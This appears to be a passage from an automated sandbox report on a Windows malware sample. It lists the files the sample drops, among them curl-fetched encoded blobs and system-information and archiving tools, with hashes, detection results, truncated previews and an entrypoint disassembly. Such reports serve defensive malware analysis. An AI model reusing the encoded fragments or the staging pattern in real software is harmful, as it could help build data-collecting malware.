                                    Preview:W0BdWUhfW0BVWUJVZmNucWdZQl1kaWRxZ1tCXVJldmVud21GZXZpYWdzLmd4ZSozW0hdMzIqW0Jd

                                    C:\Users\user\AppData\Local\Temp\qfmnd

                                    Download File
                                    Process:C:\Windows\SysWOW64\curl.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):104
                                    Entropy (8bit):5.145748944015591
                                    Encrypted:false
                                    SSDEEP:3:9zHW4mVQFjDVB++U8qYZxGgUqeJ:RHW4miRPrqYZcLqeJ
                                    MD5:BEAABAAF1170504DE9CB53DE6EA6C43D
                                    SHA1:738AF18491BDC5F5F8EB581ABF32BE11F7B4BEA0
                                    SHA-256:B3F0913BFB1C486CD263BF9540D89DA3345387EEDD5EC82AC939592E212FAD90
                                    SHA-512:4731E8A631796596E6DA6A30B5FD7F0C5DD26C9E906C33A5F9B58C82EB4E53167D5E748D5AE263EC8317C659735C8C06DF09540AB71952D0947FDFF4FF6CFD0C
                                    Malicious:false
                                    Preview:UmV2Z2Z3ZURtdGtrZXEsZ3pnKFJnfm1sd2VGZXZpY2VzLG16ZSo2KDMqKmA0ODdgNWo1MzYzNmA0MDc1NmY0MmExZmc9OmY4Ozs7IjA=

                                    C:\Users\user\AppData\Local\Temp\rrmou

                                    Download File
                                    Process:C:\Windows\SysWOW64\curl.exe
                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                    Category:dropped
                                    Size (bytes):298556
                                    Entropy (8bit):5.379476611183253
                                    Encrypted:false
                                    SSDEEP:3072:T7MVB4NzC5tmjDNpJol5YccxLSnh7VPHb6SYZ8g3H5mjhg/9/C//n0Q+v8o/q1u2:TLmOwmunJcZ8gpgq5O9YrihCTHE
                                    MD5:65E07A754EFFE6EC11638A25447289A5
                                    SHA1:948CBF6B970FFB432D8EBB1D367CEE5AFA826A83
                                    SHA-256:995338989BBEB5F5304A6C1FC13D75580A26BED964CC9F930E6D6DBC59FA5FD5
                                    SHA-512:67F896FE0B1A4385119351BD41A5D62FEF03F261A32E2B347DE2F2E1475A482BD366BC9CFFA26690EC8105DB0BC60267DF2397D6B7EC4A9CA7EE49819552CFB6
                                    Malicious:false
                                    Preview:VFZxU0lDTUFJQ0NNQUNDQy0tOkFDRG9DQ0FDQUFBQUFRQ0lDQUFBQ0NBQUNBQUFDQUlBQ0NBQUNBQ0NDQUNDQ0FBQUNJQ0FBSUNDSUFDQ0M2Q0NBQ0k8ZHdnNkF0QW5OSWBvQFRNMGpUR2hyY3lCdWNlOWxhbUZ2SUVMamJvN3RkQ0JrUlFCeWxVNm9hVTZlUEc7VEtPOXRYR1d1RFEwS0pDSUNBQUFDQ0FEQ1VzWkdoTE9tRDRReHFAZ0dNNGVaNWl5NU42TXp5QGdNTTRpWjRoTW9EJzB0ckJnVU02Z1hzal9oRjRVeHNCY0pMNllaa1xPbUQ3SVRvamFVTTRlWlVtbGhpS1F6eUBhSUFDQ0NDQ0NBQ0lJQ0NBQ0FBQUFBQUNJQ0FBQUNDQUJTUlFBQ1RJRUZDRkNRSTJLQ0FDQ0NBQUFDSU1BQUx1R0RBU1tDQ0xDQkNJTGVDUUNBQUFBQWVHb0BBQUFTQ0FBQzRBRUNBSUJDQ0FBU0FDQ0NFQ0NDQkFBQ0lDQUFJQ0NNQUNDQ0NDQ0FDSUxDQ3dDQUVBQUFnS2NGQUFNQ0NBQUNBQkFDQUpBQ0NBQUNFQ0NDRUNDQ0FBQUNJQEFBSUNDSUFDQ0NDQ0NBQ0xJMUNnQFFBQUFBQUNJQ0FBQUNDQUFDQUFBQ0FJQUNDQUFDQUNDQ0FDQ0NBQUFDSUNBQUlDQ0lBQ0NDQ0NDQUNJSUNDQUNBQUFBQUFDSUNBQUFDQ0FBQ0FBQUNBSUFDQ0FBQ0FDQ0NBQ0NDQUFBQ0lDQUFJQ0NJNENHQ3RDR0FDSUlDQ0FDQUFBQUFBQ0lDQUFBQ0NBQUNBQUFDQUlBQ0NDNTJaWmoyQUNDQ3dNTUBJQ0FRSUNDSTBDR0NDQENBQ0lJQ0NBQ0FBQUFBQUNJQ0FDQUNDR0F3Y21SamRPRUNDSUpqQUNDQzRDR0NBSEFDSUNEZ0lTQ0lBQ0NDQ0NDQUNJSUNDQUBBQUFCQUxvWmpkR0VDQ0FDR1ln

                                    C:\Users\user\AppData\Local\Temp\wbqtj

                                    Download File
                                    Process:C:\Windows\SysWOW64\curl.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):4
                                    Entropy (8bit):2.0
                                    Encrypted:false
                                    SSDEEP:3:On:On
                                    MD5:C00C81FEDEF0B80B43CC1DB8DE50C00C
                                    SHA1:1AC21B1D5ACCB55CFA0ABBBCF57F836AADA49EE2
                                    SHA-256:A23C9F5563AD1C2019C59DDE6EB4FA3442C0B5BBF83A279854A3EE3987C51E7B
                                    SHA-512:869551F28FFE1BB9BA906EAA94D9C54FD2197215510DBF5A4F053F71A45C189A570F27920AC3688862E21043854319718B6E028D25A4E453FAAD9770EDE9C6D2
                                    Malicious:false
                                    Preview:bhlo

                                    C:\Users\user\AppData\Local\Temp\zxfdn

                                    Download File
                                    Process:C:\Windows\SysWOW64\curl.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):4
                                    Entropy (8bit):2.0
                                    Encrypted:false
                                    SSDEEP:3:On:On
                                    MD5:C00C81FEDEF0B80B43CC1DB8DE50C00C
                                    SHA1:1AC21B1D5ACCB55CFA0ABBBCF57F836AADA49EE2
                                    SHA-256:A23C9F5563AD1C2019C59DDE6EB4FA3442C0B5BBF83A279854A3EE3987C51E7B
                                    SHA-512:869551F28FFE1BB9BA906EAA94D9C54FD2197215510DBF5A4F053F71A45C189A570F27920AC3688862E21043854319718B6E028D25A4E453FAAD9770EDE9C6D2
                                    Malicious:false
                                    Preview:bhlo

                                    C:\Users\user\AppData\Local\Temp\zxjrd

                                    Download File
                                    Process:C:\Windows\SysWOW64\curl.exe
                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                    Category:dropped
                                    Size (bytes):2047980
                                    Entropy (8bit):5.693378984841103
                                    Encrypted:false
                                    SSDEEP:24576:4SwAsCOCLyZNJEXP62JHUdnWcv9BK6/ZKF+l8Qz0xaEf+eJYA3pYElWzgdRe:4gs2yZryQ/ZaZkMYLZ
                                    MD5:9FAEAD3FD586F150C4D8BF862EAE33A6
                                    SHA1:D6FEE79B329461541D4BF7639DA5932A9AFB7B10
                                    SHA-256:51D99751DD2134BB485247EF29D3BB6C5B48ED08F61B2EB41F12E7E41638D8C1
                                    SHA-512:6B87F37253606B06CD9A244BB74318B95CE8719CAA5623EF10B8C26C01529C60B917A76FC56CCF70275F40290993DEC1D56284B39FE91910A9726A39DF790269
                                    Malicious:false
                                    Preview:VFZxU0lDTUFJQ0NNQUNDQy0tOkFDRG9DQ0FDQUFBQUFRQ0lDQUFBQ0NBQUNBQUFDQUlBQ0NBQUNBQ0NDQUNDQ0FBQUNJQ0FBSUNDSUFDQ0MyQ0NBQ0k8ZHdnNkF0QW5OSWBvQFRNMGpUR2hyY3lCdWNlOWxhbUZ2SUVMamJvN3RkQ0JrUlFCeWxVNm9hVTZlUEc7VEtPOXRYR1d1RFEwS0pDSUNBQUFDQ0FCQGU5RnBCWnEtTUFVY3Z4ZURHcDo2REdJOkdDWWF+eGVFWWt1NkRAcy9NSV1jdGprcEdyODRIbWtUT0FrY3R6Z2doeVU2QkpxLU1CNkpJaGVHR3A6NlVtbGhpQ1VhfnhlSUFDQ0NDQ0NBQ05KRENBQE1BUVlBMndCSlR3QUNDQUFDQUFBQzRJQUFDUXNAQ2VDQ2JlQ0NBRllKSUNCQ0lDQUxPQ0NDQ0BDQUNJS0NDQUNBQUVBQUFASUNBQUFBQ0FBREFBQUNCb0FDQ0FVQ0FDQ0NBQ0NDQVBBUklDQUVJQ0Z8Z0BLQ0NlQEFqWUlDR0FDQUVBQUFBQ0lTQUFBU0NBQUNBQUFDRUlBQ0NBQUNBQ0NDQUNDQ05Kc0NJTlFBSUNDSVFDOkNhckdBQ0lJQ0NBQ0FBQUFBakpFUEFHZ21DQUFDb0FjQ1pJa0NDQUFDQUNDQ0FDQ0NBQUFDSUNBQUlDQ0lBQ0NDQ0NDQUNJSUNDQUNBQUFBQUFDSUNBQUFDQ0FBQ0FBQUNBSUFDQ0FDQ0FDRlNBZUNDQUFBQ0lDQUFJQ0NJQUNDQ0NDQ0FDSUlDQ0FDQUFBQUFMbFpuZUhRQ0NBQ3diUUFDQUpBQ0NBQndBQ0NDQkNDQ0FBQUNJQ0FBSUNDSUFDQ0NLQ0NBW0s9e1hHRDBZUUFBWWtnQ0FBQ0NDQUFDTEFBQ0FASUNDQUFDQUNDQ0FDQ0NBQUFDSUdBQUlHQ31aRUQyW1NDQUNEcClAZ0NBc0FBQUFDQUNBQUNnQ0FBQ0FB

                                    C:\Users\user\AppData\Roaming\DolphinDumps\7za.dll

                                    Download File
                                    Process:C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe
                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                    Category:dropped
                                    Size (bytes):256512
                                    Entropy (8bit):6.608077688435287
                                    Encrypted:false
                                    SSDEEP:3072:8xDDNhSGkz5e5cfll2+NkqXGJFGOm26C2zIvr1FnYzyrnJEYAAAAA+hIefckRQEH:R6Wl20LA4OBrn+NedRO7xn3T
                                    MD5:4CA574943165D792EFADFFFF193A5395
                                    SHA1:282C147DD34EC7BB7D5631EA25C69B656B3F1D62
                                    SHA-256:7F1E0EA1984AACAEE736F3082560D53F3E990B44D6E5D2B9ED38A148DE79A0FB
                                    SHA-512:5862E41F3FFA0EFCCFB040A878C6EF9E7E00BF8A153EB8AF1031FCC047179A8D744EAFC3232C64FCAD8E43664EBA40670A9E37DC34C0BD2FA033EABDEBD5F61A
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 0%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........<U}.];..];..];.:A5..];..B0..];..B1..];..B?..];.7Ud..];..]:..];.:Uf..];..{0..];......];......];.~[=..];.F}?..];.Rich.];.........................PE..L...,.Y...........!.....J..........W5.......`...............................p.........................................z...L...d.... .......................@..4....................................................`...............................text....I.......J.................. ..`.rdata..JY...`...Z...N..............@..@.data....K..........................@....sxdata.............................@....rsrc........ ......................@..@.reloc...$...@...&..................@..B................................................................................................................................................................................................................................................

                                    C:\Users\user\AppData\Roaming\DolphinDumps\7za.exe

                                    Download File
                                    Process:C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe
                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                    Category:dropped
                                    Size (bytes):690688
                                    Entropy (8bit):6.581619840895496
                                    Encrypted:false
                                    SSDEEP:12288:rmJysC11szmzqS/Vf3gny3MhcGsnWrfATfkeafIO3rn1ExwnZE1f:r9s/zmT/my8zoW6ff4rn1ExwZE
                                    MD5:0184E6EBE133EF41A8CC6EF98A263712
                                    SHA1:CB9F603E061AEF833A2DB501AA8BA6BA007D768E
                                    SHA-256:DD6D7AF00EF4CA89A319A230CDD094275C3A1D365807FE5B34133324BDAA0229
                                    SHA-512:6FEC04E7369858970063E94358AEC7FE872886B5EA440B4A11713B08511BA3EBE8F3D9312E32883B38BAE66E42BC8E208E11678C383A5AD0F7CC0ABE29C3A8ED
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 0%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........,"..Bq..Bq..Bq..Nq.Bq..Iq.BqB.Lq.Bq..Hq.Bq..Fq.BqO..q..Bq..CqN.BqB..q.Bq..Iqy.Bq...q.Bq...q.Bq..Dq..BqRich..Bq........................PE..L...+.Y........../......8...................P....@..........................@..............................................,...x....0..@............................................................................P..(............................text....7.......8.................. ..`.rdata...@...P...B...<..............@..@.data....r...........~..............@....sxdata...... ......................@....rsrc...@....0......................@..@........................................................................................................................................................................................................................................................................................

                                    C:\Users\user\AppData\Roaming\DolphinDumps\7zxa.dll

                                    Download File
                                    Process:C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe
                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                    Category:dropped
                                    Size (bytes):147456
                                    Entropy (8bit):6.544226860164606
                                    Encrypted:false
                                    SSDEEP:3072:TYpNRok2PQFDTQQYvanxOokAAAAA+cQKiG3iral6W60b:ahFDTQdZG3zUW6
                                    MD5:4D183847804E733FB6A197E24272E870
                                    SHA1:11A11DEEE65803C75FFFB496F91494E6E1E4B7FC
                                    SHA-256:7F964A73D3BD666A494B6EB82AA984BC0B4E77172A78AA4BE786D9A578103224
                                    SHA-512:F60B02A16735BCD474838CA8854A1368A7EA157BA72A86823D5B3E1DD13EC26A9A92C458B5C554ED3DAFA594BF1F66BD9D42ABB70A6C097C076CEC1AD76BB1B5
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 0%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......jm.@................)...A...-...A...*...A...,......./...............)....*..h...5.;.!...5...,......./....,../...Rich............................PE..L.../.Y...........!....................................................................................................{...D...P....................................................................................................................text............................... ..`.rdata..;9.......:..................@..@.data....J... ......................@....sxdata......p......................@....rsrc...............................@..@.reloc..H............&..............@..B................................................................................................................................................................................................................................................

                                    C:\Users\user\AppData\Roaming\DolphinDumps\8CB16F

                                    Download File
                                    Process:C:\Users\user\AppData\Local\Temp\139918\Ur.pif
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):129
                                    Entropy (8bit):4.995518946450261
                                    Encrypted:false
                                    SSDEEP:3:6T7NRiVWUbdaFgfa3GArKM5mRPt+kiE2J5xAI7md5omEPTA:e2Wqd83GArX5kPwkn23f7mdmmEPTA
                                    MD5:C1CC6A3849E8F7DA6E9FBB55C4AFABE9
                                    SHA1:AD70501298BE899C0E5B2910F8DC6488DC5F7A21
                                    SHA-256:66707AE007664CE0D6A5B857BB8E6AF0947957D28827D77FF55A9AF5531D3D8D
                                    SHA-512:3CE89A9A30EA5C457987E500FB38AE6C864D3E6AA352C25E7BB40EE0130D7938E768E60275B6C1E2A5C2242CDFF6B22C91D3441814F8FC9E11067DDD3726A8E5
                                    Malicious:false
                                    Preview:9A5605DE11447A0E2031624EE8FBDE*user*019635*true*false*0*0*void*void*C:\Users\user\AppData\Local\Temp\139918\Ur.pif*false*1*void

                                    C:\Users\user\AppData\Roaming\DolphinDumps\PsInfo.exe

                                    Download File
                                    Process:C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe
                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                    Category:dropped
                                    Size (bytes):313496
                                    Entropy (8bit):6.329253795498564
                                    Encrypted:false
                                    SSDEEP:3072:wGicIgBsA+8vctYpleMKZUFEd0iVcxWHYGsDJXU+l9koZUFvEjqcVtb5BR+pEz2D:rl0eXEdB4FdjSvYqWdM4hM
                                    MD5:624ADB0F45CBB9CADAD83C264DF98891
                                    SHA1:E839CE1E0446D8DA889935F411F0FB7AD54D4B3E
                                    SHA-256:8F401DC021E20FF3ABC64A2D346EF6A792A5643CA04FFD1F297E417532ACAA06
                                    SHA-512:B29B3A72CD32EE34EC6CE357818658B8A89C399E2F8439A7F49FB1A506ED912F41AFA19BC5C142C9A4539ACC5966A29C6A6637C23DE0DC3E5F2D85264620BDBA
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 0%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........p.Eq..Eq..Eq..H#..Tq..H#...q..H#..bq..L...Dq..L...Pq..Eq...q..8...Fq..8...Fq..H#..Dq..Eq..Dq..8...Dq..RichEq..........PE..L...Kp{W.........................................@..........................P.............................................0........`...................>..............................................@...............D...l...`....................text............................... ..`.rdata..............................@..@.data...............................@....rsrc........`......................@..@........................................................................................................................................................................................................................................................................................................................................................

                                    C:\Users\user\AppData\Roaming\DolphinDumps\PsInfo64.exe

                                    Download File
                                    Process:C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe
                                    File Type:PE32+ executable (console) x86-64, for MS Windows
                                    Category:dropped
                                    Size (bytes):351904
                                    Entropy (8bit):6.077576126824556
                                    Encrypted:false
                                    SSDEEP:6144:0aNJZh5a45XRueuTI52O17cNq7tncFSsTTB8YS6SBjyxgg4Lf4fC:0aFi45z2ancFn/0jlJ
                                    MD5:EFA2F8F73B3559711149DFDEB8BC288E
                                    SHA1:453C70E4B12ECABE860866165AD39DE6361215FD
                                    SHA-256:EF5CF80C8448BF0907C634A3251CC348B1D36BB5AD8F31F23B11D12AA7F63BCB
                                    SHA-512:63F75A3D639A912E2E3966E9D410F8E1C52B75300518BB5083853EF2633C7E109C037EA2B66CED57BD5B319866A14BCD92254CB38AB9EC7B99465B0A8A8F5F3E
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 0%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........~...~...~.../S..~.../l..~.../R..~....4..~.... ..~...~..!~....S..~....R..~...,h..~...~$..~....m..~..Rich.~..........................PE..d....o{W..........#.................p..........@.......................................... .................................................h........................ ...>..............................................p.......................`....................text.............................. ..`.rdata...-..........................@..@.data...@...........................@....pdata..............................@..@.rsrc............ ..................@..@................................................................................................................................................................................................................................................................................

                                    C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe

                                    Download File
                                    Process:C:\Users\user\AppData\Local\Temp\139918\Ur.pif
                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                    Category:dropped
                                    Size (bytes):167936
                                    Entropy (8bit):6.1797557233483955
                                    Encrypted:false
                                    SSDEEP:3072:IeAGcNNwmlR2GNUbomMYMLnbtoKOmiNL2SJOUOhop:CvNNtWuYcqHmiNLOc
                                    MD5:75375C22C72F1BEB76BEA39C22A1ED68
                                    SHA1:E1652B058195DB3F5F754B7AB430652AE04A50B8
                                    SHA-256:8D9B5190AACE52A1DB1AC73A65EE9999C329157C8E88F61A772433323D6B7A4A
                                    SHA-512:1B396E78E189185EEFB8C6058AA7E6DFE1B8F2DFF8BABFE4FFBEE93805467BF45760EEA6EFB8D9BB2040D0EAA56841D457B1976DCFE13ED67931ADE01419F55A
                                    Malicious:false
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 0%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........R.D.3...3...3...,...3...3...3.../...3.......3.../...3.......3..Rich.3..........................PE..L...P.#B............................xH............@.........................................................................07..P....................................................................................................................text............................... ..`.rdata...a.......p..................@..@.data....b...P...@...P..............@...........................................................................................................................................................................................................................................................................................................................................................................................................................

                                    C:\Users\user\AppData\Roaming\DolphinDumps\jvx

                                    Download File
                                    Process:C:\Windows\SysWOW64\cmd.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:modified
                                    Size (bytes):53
                                    Entropy (8bit):3.5007143226894013
                                    Encrypted:false
                                    SSDEEP:3:XrEIuqujyM1K8vF:Xrhurj1hF
                                    MD5:C16330B5345B80BA27AF8BFD4299904E
                                    SHA1:9F573E303431E956395DC09C510C445AE55EF7D7
                                    SHA-256:D6306F25B6B4CF4D6A82A4BBB691932AD74730EC3D9A4C2D5EC90B1574D4BAFE
                                    SHA-512:173F20932FAF91348AE1B26BC99DFFD4B438B6868921E5B5352FB1B513382203E49643DD2129B7365D570159DADF108440141D4D77193C1C6108A2140B9CE3F6
                                    Malicious:false
                                    Preview:OS Name: Microsoft Windows 10 Pro..

                                    C:\Users\user\AppData\Roaming\DolphinDumps\nircmdc.exe

                                    Download File
                                    Process:C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe
                                    File Type:PE32 executable (console) Intel 80386, for MS Windows, UPX compressed
                                    Category:modified
                                    Size (bytes):44544
                                    Entropy (8bit):7.766110456396969
                                    Encrypted:false
                                    SSDEEP:768:UF24SNifq4YWc5uEvW7KrQaFzs4C9B18sEufqnYIG0y8XmEsYR2fWIrKiSU:UMNG9c5jfQ8XoB18FufVIG092lWAKiSU
                                    MD5:0E69B6BD18E064C83A11B48495C1B01E
                                    SHA1:21C4CC08D3600C564BD0D04C8553E59F564BFFF4
                                    SHA-256:67E0D635825CBF7CC213670F671544DA9FF18047742DD4A0696A508B79EEF607
                                    SHA-512:E7C9B9209359183ADE3502AD9C8807B7948D38FD0EF883655DECEF2E5F212BE646A0E3FD93B51988595511B979C669DEE8F9F2A3BA90A4B0CECF0423FF2D3F51
                                    Malicious:false
                                    Antivirus:
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 5%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........6...W...W...W..=X..W...t...W..$t...W...t...W..=X..W...W...V.....W......W......W..Rich.W..........................PE..L....'C].........................................@.................................................................................................................................................................................................UPX0....................................UPX1................................@....rsrc...............................@......................................................................................................................................................................................................................................................................................................................................................................................3.03.UPX!....

                                    C:\Users\user\AppData\Roaming\DolphinDumps\xhwq.zip

                                    Download File
                                    Process:C:\Users\user\AppData\Local\Temp\139918\Ur.pif
                                    File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                    Category:dropped
                                    Size (bytes):1019991
                                    Entropy (8bit):7.9981268397514125
                                    Encrypted:true
                                    SSDEEP:24576:I8QnhcAisyibvw8QJTTRz+oH7OgXwWpiubynw7ynLbzCQ:Itns7GY1XSsOQfE/7bzCQ
                                    MD5:9E73FB50D37E37EE8BD19A8E3D2B82CA
                                    SHA1:3DB1C548E86E4BB7457324A3097B05DA15B7FFC3
                                    SHA-256:68BA7122EE8D9CE34ED94B6036A171CE38D6D9D9B3A609C2F4DE773F4DD40D5C
                                    SHA-512:B41209300F018103B0F8A4DE0537F348A3BDFCBC8FEB19E7FEC6634B06C266CC442145FD2D9230F827F273B0D07BB6BBCAB7A0F0E9E1F558E6DD7A076F568094
                                    Malicious:true
                                    Preview:PK.........e.K...yq1...@......7zxa.dll...x......d'.,.b.X%j....5.Q.7.....l.d.B.m%.)mi...$.6.2..b_...R}k[....FK...l"..O...FE.uC...02.9.../.?...=..<.......{...k.g.8N.?]....sr.....)W.0.{v.k.:.E..*..g]....~..k.......J.__.Q/.'..d......w.^}...).X.u..7..N........Y...i.....J........i.mi30..*Mo.........i...D.GR~@.....}.....X......E|.w.,...q7.J.0.U...,....<..}O`p.'...L..f..........PT.%..b`s..;..............|I......<?}%./.06M......I_.8G^.....g.Fp.y.K.=..3&..$.O..a....V.6..8.]..._W...j:..g....9o._....R.+.2x^3!.<.......kv..S.u.f..L.m.......3....=....d.S....Q...~..........A..`...._f?.We.U6.H..D6...dk...4.Z....Q-...............a...^^...uTr...O:x'......uh.)..>"...f.S.l.Rb.}f.m..c.0%Yd...x.W...\....u..^....WZ..z......t+..{.....D....s.ne2....GN.qa.p..7.kD..5......v.C......~.k...f]6....P..%#.%.z.$E.!..>....#.. ......g..YH..7U.0..W.).S.........*.*..^"..([.g.)d....iWc...j.w'....F.'s...M."..={.{s<........}.3..s).|........\~.T..-k..V~....n......

                                    C:\Users\user\AppData\Roaming\DolphinDumps\zip.exe

                                    Download File
                                    Process:C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe
                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                    Category:dropped
                                    Size (bytes):135168
                                    Entropy (8bit):6.567755066270725
                                    Encrypted:false
                                    SSDEEP:3072:8yiIL2aUStYI4kOojhmlDUaKhVV4dD+mO3teRl:k2bukOkhK4aKhVV/
                                    MD5:83AF340778E7C353B9A2D2A788C3A13A
                                    SHA1:55C5A72010291FCA2275CCFB5B497DD0BAC11A60
                                    SHA-256:E9929598C98359773B7C51E3C4461D0F99B1703790FF775AEE3C63A9A9A74CA8
                                    SHA-512:FCC810D84BFE8876123757B5E7BBBB571D7FBF3B3068B81215BDECFD0742AC94EDEEF5589277A67C40693D1182676604BC0E2F2610421AC138C59750E1CFED86
                                    Malicious:false
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 0%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......}.1.9._.9._.9._....;._.*.6.(._.<.?.;._.<.P./._.`.L.:._.9.^.W._.Z.u.;._.<...._.<...8._.Rich9._.................PE..L......D.....................P....................@.........................................................................8...<....................................................................................................................text...A........................... ..`.rdata...[.......`..................@..@.data...D...........................@...........................................................................................................................................................................................................................................................................................................................................................................................................

                                    \Device\ConDrv

                                    Download File
                                    Process:C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):293
                                    Entropy (8bit):3.479129918610545
                                    Encrypted:false
                                    SSDEEP:6:esaSfLq2ANq2XCNq28gSNq2LwcNq2L+V0Nq2+BSNq2SWXLXS:6Szq20q2Xiq2TSq20Aq2eYq2QSq2/7S
                                    MD5:8FCA86EBFED803CF311D9FCC42835C2E
                                    SHA1:36B77381AD0DE20CD1BDFA45695954314CB3D19F
                                    SHA-256:0D11AA28844832C1BDEF3AA868FC514E72E92CF1B740AFC467AD5692A0A8BDC1
                                    SHA-512:078D144DC41383E933587BDB428702EFDD3D796118AE1559B84750207C8909BA5D554FF7321EFD3002439660ADA43CF7544370682B5150A7C597286751B3D529
                                    Malicious:false
                                    Preview:Archive: xhwq.zip.. inflating: 7zxa.dll .. inflating: 7za.dll .. inflating: 7za.exe .. inflating: PsInfo.exe .. inflating: PsInfo64.exe .. inflating: zip.exe .. inflating: nircmdc.exe ..

                                    Static File Info

                                    General

                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                    Entropy (8bit):7.978810284296215
                                    TrID:
                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                    • DOS Executable Generic (2002/1) 0.02%
                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                    File name:vqMMwqCFZQ.exe
                                    File size:1'069'345 bytes
                                    MD5:8e55a7932d1b9649aba9d3e97ca688ce
                                    SHA1:32afffa80d0f8778c8670f1b9996c602a81de455
                                    SHA256:5b14c48842c63552a468d3da9500bb34f3bbd1cd16decbc17a22ff0f2aada887
                                    SHA512:4109f2a63005d8ba7cffb25b54c1dd5993fe855795cc7a39bb520b153f7d87c01dd46a644b4431fefa63a2c47ce40e1f7d10fc10b9ac8313aa8049c2852e5931
                                    SSDEEP:24576:2TjI1hepdrX4EEx4W+N1zRlDlP9O4NPhGEdfqr:y4XxLq1zRnV6r
                                    TLSH:FE3523F28293D831E5B60475297098551EB2FC0A8578C582B31578EAF335783E3AEB77
                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................n.......B...8.....

                                    File Icon

                                    Icon Hash:baf062fe9efaf2c0

                                    Static PE Info

                                    General

                                    Entrypoint:0x403883
                                    Entrypoint Section:.text
                                    Digitally signed:true
                                    Imagebase:0x400000
                                    Subsystem:windows gui
                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                    Time Stamp:0x4F47E2DA [Fri Feb 24 19:19:54 2012 UTC]
                                    TLS Callbacks:
                                    CLR (.Net) Version:
                                    OS Version Major:5
                                    OS Version Minor:0
                                    File Version Major:5
                                    File Version Minor:0
                                    Subsystem Version Major:5
                                    Subsystem Version Minor:0
                                    Import Hash:be41bf7b8cc010b614bd36bbca606973

                                    Authenticode Signature

                                    Signature Valid:
                                    Signature Issuer:
                                    Signature Validation Error:
                                    Error Number:
                                    Not Before, Not After
                                      Subject Chain
                                        Version:
                                        Thumbprint MD5:
                                        Thumbprint SHA-1:
                                        Thumbprint SHA-256:
                                        Serial:

                                        Entrypoint Preview

                                        Instruction
                                        sub esp, 000002D4h
                                        push ebx
                                        push ebp
                                        push esi
                                        push edi
                                        push 00000020h
                                        xor ebp, ebp
                                        pop esi
                                        mov dword ptr [esp+18h], ebp
                                        mov dword ptr [esp+10h], 00409268h
                                        mov dword ptr [esp+14h], ebp
                                        call dword ptr [00408030h]
                                        push 00008001h
                                        call dword ptr [004080B4h]
                                        push ebp
                                        call dword ptr [004082C0h]
                                        push 00000008h
                                        mov dword ptr [00472EB8h], eax
                                        call 00007F0C88C2A48Bh
                                        push ebp
                                        push 000002B4h
                                        mov dword ptr [00472DD0h], eax
                                        lea eax, dword ptr [esp+38h]
                                        push eax
                                        push ebp
                                        push 00409264h
                                        call dword ptr [00408184h]
                                        push 0040924Ch
                                        push 0046ADC0h
                                        call 00007F0C88C2A16Dh
                                        call dword ptr [004080B0h]
                                        push eax
                                        mov edi, 004C30A0h
                                        push edi
                                        call 00007F0C88C2A15Bh
                                        push ebp
                                        call dword ptr [00408134h]
                                        cmp word ptr [004C30A0h], 0022h
                                        mov dword ptr [00472DD8h], eax
                                        mov eax, edi
                                        jne 00007F0C88C27A5Ah
                                        push 00000022h
                                        pop esi
                                        mov eax, 004C30A2h
                                        push esi
                                        push eax
                                        call 00007F0C88C29E31h
                                        push eax
                                        call dword ptr [00408260h]
                                        mov esi, eax
                                        mov dword ptr [esp+1Ch], esi
                                        jmp 00007F0C88C27AE3h
                                        push 00000020h
                                        pop ebx
                                        cmp ax, bx
                                        jne 00007F0C88C27A5Ah
                                        add esi, 02h
                                        cmp word ptr [esi], bx

                                        Rich Headers

                                        Programming Language:
